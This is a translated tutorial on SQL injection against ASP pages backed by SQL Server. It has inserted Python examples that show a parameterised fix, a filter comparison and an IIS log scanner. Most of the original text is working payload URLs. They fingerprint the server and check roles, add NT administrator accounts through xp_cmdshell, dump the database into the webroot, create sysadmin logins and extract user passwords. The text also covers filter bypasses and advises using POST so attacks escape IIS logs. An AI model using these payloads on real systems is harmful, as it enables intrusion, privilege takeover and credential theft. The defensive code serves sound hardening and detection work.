
An introduction to SQL Server injection attacks on the web

With the spread of the B/S (browser/server) model of application development, more and more programmers write applications in this style. The entry threshold of the industry is not high, however, and the skill and experience of programmers vary widely, so a large proportion of them write code that never checks whether user input is legal, and the resulting applications are insecure. A user can submit database query code of his own and, from what the program returns, learn data he was never meant to see. This is the so-called SQL injection.

SQL injection attacks happen regularly. They can let unscrupulous users search your data, change server settings, or, while you are not paying attention, take over your server. SQL injection is not a SQL Server problem but a problem of improperly written programs. If you want to run such programs, you must understand that you are accepting a certain degree of risk.

First, the principle

Before understanding SQL injection you should first know some basics of B/S-mode applications, as well as how the browser and the server interact. As for domestic conditions, websites built on ASP + Access or ASP + SQL Server account for more than 70%, PHP + MySQL for 20%, and everything else for less than 10%. In the ASP + SQL Server structure an ASP process is a SQL Server client: it needs a legitimate SQL login name and password to connect to the SQL Server database. The following is a typical piece of ASP code for connecting to SQL Server:

<%
rServer = "IBM-WEB-01"    ' SQL Server address
rUid = "webuser"          ' SQL Server login
rPwd = "xxxxxxxxf"        ' SQL Server password
rDatabase = "sitelog"     ' SQL Server database name
Set conn = Server.CreateObject("ADODB.Connection")
' ODBC driver name goes in braces; the original text had it in parentheses, which the driver manager rejects
strconn = "driver={SQL Server}; server=" & rServer & "; uid=" & rUid & "; pwd=" & rPwd & "; database=" & rDatabase
conn.Open strconn
%>

The SQL injection vulnerability arises where the developer builds a WHERE clause by joining the user's input into it. For example, here is a simple ASP program, article_show.asp, which reads an ID from the GET parameters and displays the article in the info_article table whose ID matches that value.

<%
strID = Trim(Request.QueryString("ID"))
strSQL = "select * from info_article where ID = " & strID
Set rs = Server.CreateObject("ADODB.Recordset")
rs.Open strSQL, conn, 1, 3
%>
<table width="100%" border="0" cellpadding="10" cellspacing="1" class="table1">
<tr class="trtitle">
<td><div align="center"><%= rs("title") %><br></div></td>
</tr>
<tr class="trcontent">
<td><%= rs("content") %></td>
</tr>
</table>

Note the line strSQL = "select * from info_article where ID = " & strID. At run time the client accesses the ASP program with a URL like http://www.abc.com/article_show.asp?ID=12. When ID is the number 12, strID holds the string "12"; the VBScript "&" operator concatenates data of any type, so strSQL becomes select * from info_article where ID = 12, which is a normal SQL statement. VBScript is a weakly typed language: variables carry no type declaration (they need not be declared at all). This is sometimes convenient for the programmer, but it also makes it easy to leave loopholes in the program. Because this program does not restrict the type of the variable strID, it has a SQL injection vulnerability.
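The vulnerable line above and its corrected form, as an added example that is not part of the original article: the ASP logic is re-expressed in Python against an in-memory SQLite table that stands in for the SQL Server sitelog database and the ADODB objects. The table contents, the function names and the probe values fed to them are assumptions made for the demonstration; the hardened version does what CLng() would do in VBScript (reject anything that is not an integer) and then binds the value as a parameter instead of pasting it into the SQL text.

```python
import re
import sqlite3


def make_db():
    """Constructed stand-in for the article's sitelog database: an in-memory SQLite
    table with the name and columns the ASP page reads (ID, title, content)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE info_article (ID INTEGER PRIMARY KEY, title TEXT, content TEXT)")
    conn.executemany(
        "INSERT INTO info_article VALUES (?, ?, ?)",
        [(12, "Article twelve", "Body of article twelve"),
         (13, "Article thirteen", "Body of article thirteen")],
    )
    return conn


def show_article_vulnerable(conn, str_id):
    """Python rendering of article_show.asp: the raw ID from the query string is
    concatenated into the WHERE clause exactly as strSQL = "..." & strID does."""
    sql = "select * from info_article where ID = " + str_id
    try:
        return {"sql": sql, "rows": conn.execute(sql).fetchall(), "error": None}
    except sqlite3.Error as exc:
        # The real page let the database error reach the browser; that message is what
        # shows a tester that the input was parsed as SQL.
        return {"sql": sql, "rows": [], "error": str(exc)}


def show_article_hardened(conn, str_id):
    """Hardened form: an allow-list check that ID is a plain integer (the role CLng()
    plays in VBScript) followed by a parameterised query, so the value is never SQL text."""
    value = str_id.strip()
    if not re.fullmatch(r"[0-9]{1,9}", value):
        return {"sql": None, "rows": [], "error": "Illegal parameter value"}
    sql = "select * from info_article where ID = ?"
    return {"sql": sql, "rows": conn.execute(sql, (int(value),)).fetchall(), "error": None}


if __name__ == "__main__":
    db = make_db()
    # "12" is the normal request; "12 '" and "12 and 1 = 2" are the probes the article
    # uses in its testing section.
    for probe in ("12", "12 '", "12 and 1 = 2"):
        print(repr(probe), "vulnerable:", show_article_vulnerable(db, probe))
        print(repr(probe), "hardened:  ", show_article_hardened(db, probe))
```

Run as a script it prints, for each probe, what the concatenating version executes and returns next to what the hardened version does: the quoted probe becomes a parser error in the first and a rejected parameter in the second, and the "and 1 = 2" probe silently changes the result set of the first while never reaching SQL in the second.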

Second, testing

Now try entering the following URL in the browser:

http://www.abc.com/article_show.asp?ID=12 '

The value of strSQL is then:

select * from info_article where ID = 12 '

This is an illegal SQL Server query, so the server returns the following error:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server] Unclosed quotation mark before the character string ''.

This error alone tells us that the website can be attacked by injection.

In some cases the server instead shows "an error occurred while processing the URL on the server", because IIS has been configured not to send detailed error messages to the client. Injection is not necessarily impossible then, but it becomes much more difficult and depends on luck.

In some cases the server displays the content for ID = 12 with no error message at all; the developer may have filtered single quotation marks. Try the following:

article_show.asp?ID=12 and 1=2

If the following error appears, injection is still probably possible:

Error '80020009'
Exception occurred.

Note: if any of the following error messages appears, the injection certainly cannot be completed, because the program converts the parameter to a number or binds it as a typed parameter before it reaches SQL:

Microsoft VBScript runtime error '800a000d'
Type mismatch: 'cint'

Microsoft VBScript runtime error '800a000d'
Type mismatch: 'clng'

Microsoft VBScript runtime error '800a000d'
Type mismatch: 'cdbl'

Microsoft VBScript runtime error '800a000d'
Type mismatch: 'c'

Illegal parameter values.
Please enter the correct parameter values.

ADODB.Parameter error '800a0d5d'
Application uses a value of the wrong type for the current operation.

Third, collecting information

Once it is established that injection is possible, the server can be probed with the following methods.

Test the SQL Server version:

article_show.asp?ID=(SELECT @@VERSION)

Returns:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server] Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4)' to a column of data type int.

Test the current SQL Server login's user name:

article_show.asp?ID=(USER_NAME())

Returns:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server] Syntax error converting the nvarchar value 'webuser' to a column of data type int.

Note: if the login is sa, dbo appears here instead.

Test the name of the SQL Server database currently in use:

article_show.asp?ID=(DB_NAME())

Returns:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server] Syntax error converting the nvarchar value 'sitelog' to a column of data type int.

Test whether the current user is in the "sysadmin" role:

SELECT IS_SRVROLEMEMBER('sysadmin')

This SQL statement tests whether the currently logged-on login is a member of the sysadmin server role: the return value is 1 if it is and 0 if it is not. Because the result is a number it would not cause a conversion error, so it is turned into a character string in order to see the actual value. Write the following URL (CHAR(115) is the character 's', and %2B is the URL encoding of the plus sign +):

article_show.asp?ID=(SELECT CHAR(115)%2BCAST(IS_SRVROLEMEMBER('sysadmin') AS VARCHAR(2)))

Returns:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server] Syntax error converting the varchar value 's0' to a column of data type int.

If the value is '0' the user is not a member of the 'sysadmin' role; if it is '1', the user is.

Test whether the current user is in the "db_owner" role:

article_show.asp?ID=(SELECT CHAR(115)%2BCAST(IS_MEMBER('db_owner') AS VARCHAR(2)))

Returns:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server] Syntax error converting the varchar value 's1' to a column of data type int.

This already yields a lot of valuable information. If the test shows that the current user is a member of the sysadmin role, there is a good chance that a cmd shell can be run on this SQL Server. If it is db_owner, any operation on the currently connected database is possible: creating tables, deleting tables, inserting data, reading data and so on.
Fourth, operations a sysadmin user can carry out

Note: for the following operations the server no longer returns details in an error message; only the SQL statements themselves can be used.

Add an NT user:

article_show.asp?ID=12; EXEC master..xp_cmdshell "net user name password /add" --

Add that user to the administrators group:

article_show.asp?ID=12; EXEC master..xp_cmdshell "net localgroup administrators name /add" --

Make a complete backup of the database into the web site directory so that it can be downloaded:

article_show.asp?ID=12; BACKUP DATABASE database name TO DISK = 'c:\Inetpub\wwwroot\1.db'; --

Add a SQL Server login:

article_show.asp?ID=12; EXEC sp_addlogin 'uname', 'pwd' --

Add the login to the db_owner role:

article_show.asp?ID=12; EXEC sp_adduser 'uname', 'db_owner' --

Add the login to the sysadmin fixed server role:

article_show.asp?ID=12; EXEC sp_addsrvrolemember 'uname', 'sysadmin' --

The reverse operations:

Remove the login from the sysadmin fixed server role:

article_show.asp?ID=12; EXEC sp_dropsrvrolemember 'uname', 'sysadmin' --

Remove the login from the db_owner role:

article_show.asp?ID=12; EXEC sp_dropuser 'uname', 'db_owner' --

Delete the login:

article_show.asp?ID=12; EXEC sp_droplogin 'uname' --

After the above operations the server will normally display the following message, or simply the ID = 12 page:

Error '80020009'
Exception occurred.

Fifth, operations an ordinary user can carry out

Ordinary users cannot use the commands listed in part four, but they can still read out all the data in the database.

Use the following statement to list the name of the first table in the database:

article_show.asp?ID=(SELECT TOP 1 NAME FROM SYSOBJECTS WHERE XTYPE = 'U' AND STATUS > 0 AND NAME NOT IN (''))

Suppose the first table is called info_files; use the following statement to get the second table:

article_show.asp?ID=(SELECT TOP 1 NAME FROM SYSOBJECTS WHERE XTYPE = 'U' AND STATUS > 0 AND NAME NOT IN ('info_files'))

Suppose the second table is called info_articles; use the following statement to get the third table:

article_show.asp?ID=(SELECT TOP 1 NAME FROM SYSOBJECTS WHERE XTYPE = 'U' AND STATUS > 0 AND NAME NOT IN ('info_files', 'info_articles'))

Suppose the third table is called info_users.

Use the following statement to get the name of the first field of table info_users:

article_show.asp?ID=(SELECT COL_NAME(OBJECT_ID('info_users'), 1))

Use the following statement to get the name of the second field:

article_show.asp?ID=(SELECT COL_NAME(OBJECT_ID('info_users'), 2))

Supposing the structure of info_users is ID, username, password, use the following statement to get the username value of the first record:

article_show.asp?ID=(SELECT TOP 1 username FROM info_users)

Use the following statement to get the password value of the first record:

article_show.asp?ID=(SELECT TOP 1 password FROM info_users)

Use the following statement to get the ID value of the first record:

article_show.asp?ID=(SELECT TOP 1 CHAR(115)%2BCAST(ID AS VARCHAR(2)) FROM info_users)

Sixth, notes

Many developers filter the ' character as a way of "preventing" injection vulnerabilities, but the relevant functions can still be used to get around such restrictions in the program. For example, look at how these words can be transformed:

In simple cases: for where xtype = 'U', the ASCII code of the character U is 85, so where xtype = char(85) can be used instead; if the characters are Chinese, for example where name = '用户' (user), where name = nchar(29992) + nchar(25143) can be used instead.

Some people filter the keywords Select, Update and Delete but forget about letter case, so we can try selecT.
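To show why the quote-stripping and keyword-blocking filters described here fail while a type check does not, the following added example (not from the article) runs the article's inputs through a denylist filter of the kind described and through an integer allow-list. The exact filter rules, the input labels and the function names are assumptions; the inputs are the ones the article itself uses, including the char(85) and selecT rewrites.

```python
import re

# The kind of "filter" the article describes: drop single quotes and block a few
# spellings of SELECT / UPDATE / DELETE. It is a denylist, so any spelling it does
# not list gets through.
BLOCKED_KEYWORDS = ("select", "Select", "SELECT",
                    "update", "Update", "UPDATE",
                    "delete", "Delete", "DELETE")


def denylist_filter(value):
    """Return the value as such a filter would pass it on, or None if it blocks it."""
    cleaned = value.replace("'", "")
    if any(keyword in cleaned for keyword in BLOCKED_KEYWORDS):
        return None
    return cleaned


def allowlist_filter(value):
    """Accept only what article_show.asp actually needs: a plain integer ID."""
    value = value.strip()
    return value if re.fullmatch(r"[0-9]{1,9}", value) else None


# Inputs as the article gives them (constructed labels): the normal value, the
# boolean probe from the testing section, the SYSOBJECTS listing, and the same
# listing rewritten with char(85) for 'U' and mixed-case selecT.
PAGE_INPUTS = {
    "normal": "12",
    "boolean probe": "12 and 1 = 2",
    "table listing": "(SELECT TOP 1 NAME FROM SYSOBJECTS WHERE XTYPE = 'U')",
    "case rewrite": "(selecT TOP 1 NAME FROM SYSOBJECTS WHERE XTYPE = char(85))",
}


def compare_filters(inputs=PAGE_INPUTS):
    """For each input, report what each filter would let reach the SQL string
    (None means blocked)."""
    return {
        label: {"denylist": denylist_filter(value), "allowlist": allowlist_filter(value)}
        for label, value in inputs.items()
    }


if __name__ == "__main__":
    for label, outcome in compare_filters().items():
        print(f"{label:14} denylist -> {outcome['denylist']!r}")
        print(f"{'':14} allowlist -> {outcome['allowlist']!r}")
```

The denylist stops only the one spelling it knows: the boolean probe contains neither a quote nor a listed keyword, and the case rewrite needs neither, so both reach the query unchanged. The allow-list never has to know what an attack looks like; it only has to know what a legitimate ID looks like.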

Do not expect to guess field names out of thin air; it is better to look at the site's login form, because for convenience developers generally give the form's input names the same names as the database fields.

Special note: in the address bar a + is interpreted as a space, %2B as the + sign, and %25 as the % sign; for details refer to the relevant URLEncode documentation.

When the GET method is used, IIS logs every string you submit; the POST method is not recorded, so on websites where POST is possible, use it rather than GET as far as possible.
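Because the IIS log records GET query strings, a defender can look there for the probes this article describes. The following added example (not part of the article) scans constructed IIS W3C log lines for a non-numeric ID parameter and for the SQL fragments used in the earlier sections. The log lines, the field layout, the indicator list and the function names are assumptions; as the paragraph above notes, POST bodies do not appear in the log, so this covers only GET requests.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample IIS W3C log (not from the article). Field order follows the
# #Fields header: date time s-ip cs-method cs-uri-stem cs-uri-query s-port
# cs-username c-ip sc-status. Line 2 is a normal request; lines 3 to 5 carry the
# quote probe, the @@VERSION probe and the xp_cmdshell stacked query from the text.
SAMPLE_LOG = """#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip sc-status
2003-06-01 10:00:01 10.0.0.5 GET /article_show.asp ID=12 80 - 192.0.2.10 200
2003-06-01 10:00:07 10.0.0.5 GET /article_show.asp ID=12%20' 80 - 192.0.2.10 500
2003-06-01 10:00:15 10.0.0.5 GET /article_show.asp ID=(SELECT%20@@VERSION) 80 - 192.0.2.10 500
2003-06-01 10:00:31 10.0.0.5 GET /article_show.asp ID=12;EXEC%20master..xp_cmdshell%20%22dir%22%20-- 80 - 192.0.2.10 500
2003-06-01 10:01:02 10.0.0.5 GET /index.asp - 80 - 192.0.2.11 200
"""

# Fragments the article sends through the ID parameter, lower-cased for matching.
INDICATORS = ("'", ";", "--", "@@version", "user_name(", "db_name(",
              "is_srvrolemember(", "is_member(", "xp_cmdshell", "backup database",
              "sp_addlogin", "sp_addsrvrolemember", "sysobjects", "col_name(", "char(")


def analyse_query(cs_uri_query):
    """Return the reasons a query string looks like an injection attempt ([] if none)."""
    reasons = []
    if cs_uri_query == "-":  # IIS writes '-' when the request had no query string
        return reasons
    # Split on '&' only, so a ';' inside a value stays part of that value.
    for pair in cs_uri_query.split("&"):
        name, _, raw = pair.partition("=")
        if name.lower() == "id" and not re.fullmatch(r"[0-9]+", unquote_plus(raw).strip()):
            # article_show.asp only ever expects a number here; anything else is a probe.
            reasons.append("non-numeric ID")
    decoded = unquote_plus(cs_uri_query).lower()
    reasons.extend(token for token in INDICATORS if token in decoded)
    return reasons


def scan_iis_log(text):
    """Return one finding per suspicious log line, with the client, status and reasons."""
    findings = []
    for number, line in enumerate(text.splitlines(), 1):
        if not line or line.startswith("#"):
            continue
        fields = line.split(" ")
        if len(fields) < 10:
            continue
        reasons = analyse_query(fields[5])
        if reasons:
            findings.append({"line": number, "client": fields[8], "status": fields[9],
                             "uri": fields[4], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in scan_iis_log(SAMPLE_LOG):
        print(finding)
```

The "non-numeric ID" check is the most general signal for this page, since the application itself only needs a number; the indicator list adds the specific fragments from the article, and a 500 status on the same line (the ASP error page) corroborates that the input reached the database driver.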

The SQL Server injection attack described above is not limited to these methods; many SQL statements of your own can be used to obtain the information you want. After SQL Server is installed you will find "SQL Server Books Online", which documents all the statements, functions, system stored procedures and security features of SQL Server and is a very good reference.


Yung-based enterprise network security division

Source: http://translate.google.com.ec/translate?hl=en&sl=zh-CN&u=http://www.rj-itop.com/gonggao.php%3Fid%3D4633&ei=2HdBStmhNYmQkAXH-Kz7CA&sa=X&oi=translate&resnum=3&ct=result&prev=/search%3Fq%3Dselect%2Btop%2B1%2Bchar(*)%26hl%3Den%26sa%3DN%26start%3D30
